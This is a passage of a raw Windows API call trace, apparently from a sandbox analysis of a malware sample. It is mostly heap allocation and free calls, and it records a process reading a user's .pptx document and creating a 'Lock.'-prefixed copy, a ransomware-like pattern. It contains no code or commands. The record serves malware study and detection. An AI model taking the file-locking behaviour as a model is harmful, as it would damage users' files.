hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.042] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.042] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.042] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.042] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0260.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/2tDiT2As-QJTabaRcc L.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tdit2as-qjtabarcc l.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0260.043] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0260.043] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0260.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0260.043] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.043] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.043] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.044] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.2tDiT2As-QJTabaRcc L.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.2tdit2as-qjtabarcc l.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0260.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0260.045] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0260.045] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.045] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0260.045] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0260.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0260.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.045] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0260.045] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xbb35, lpOverlapped=0x0) returned 1 [0260.047] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0260.050] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0260.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xbb35) returned 0x24b7a48 [0260.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0260.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.051] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0260.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0260.051] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0260.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.052] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0260.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0260.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xbb35) returned 0x24b7a48 [0260.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1368 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0260.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0260.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0260.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xbb35) returned 0x24cf0c8 [0260.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0260.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0260.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0260.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0260.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0260.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0260.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0260.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0260.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0260.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.056] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0260.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0260.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0260.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0260.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.057] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0260.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.058] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0260.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0260.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0260.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0260.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.059] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.059] RtlAllocateHeap 